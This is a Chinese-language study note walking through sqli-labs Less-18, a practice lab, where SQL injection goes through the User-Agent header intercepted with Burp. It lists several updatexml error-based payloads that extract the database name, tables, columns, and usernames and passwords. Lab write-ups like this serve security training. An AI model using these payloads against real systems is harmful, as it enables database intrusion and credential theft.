Sqli-labs-Less-18(笔记)

时间:2024-06-08 06:57:18

Sqli-labs-Less-18(笔记)

在进行第十八关的时候,也许会发生使用admin无法登陆的问题,这是因为在第十七关进行了密码重置
我们只需要将数据库重置一下就ok。
Sqli-labs-Less-18(笔记)
在第十八关
1.登录失败显示ip地址
2.登录成功显示ip地址和User-Agent
Sqli-labs-Less-18(笔记)
在这里无论是在账户还是密码处都无法注入,因为进行了注释
uname=admin’#&passwd=admin&submit=Submit
Sqli-labs-Less-18(笔记)

在这里我们需要使用http头协议,使用burp进行抓包获取
Sqli-labs-Less-18(笔记)
我们在此处进行修改,修改完后点击放包
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0 ’ or updatexml(1,(concat(0x7e,(select database()),0x7e)),1) and ‘1’='1
Sqli-labs-Less-18(笔记)

回显出当前数据库
Sqli-labs-Less-18(笔记)
查询数据库
’ or updatexml(1,(concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e)),1) and ‘1’='1
Sqli-labs-Less-18(笔记)
Sqli-labs-Less-18(笔记)
查询表(security)
’ or updatexml(1,(concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e)),1) and ‘1’='1
Sqli-labs-Less-18(笔记)
Sqli-labs-Less-18(笔记)

查询字段(为了方便只在burp中演示)
’ or updatexml(1,(concat(0x7e,(select column_name from information_schema.columns where table_name=‘users’ limit 0,1),0x7e)),1) and ‘1’='1
Sqli-labs-Less-18(笔记)

查询账户(username)
’ or updatexml(1,(concat(0x7e,(select username from security.users limit 0,1),0x7e)),1) and ‘1’='1
Sqli-labs-Less-18(笔记)

查询密码(password)
’ or updatexml(1,(concat(0x7e,(select password from security.users limit 0,1),0x7e)),1) and ‘1’='1

Sqli-labs-Less-18(笔记)
以此类推爆出所有数据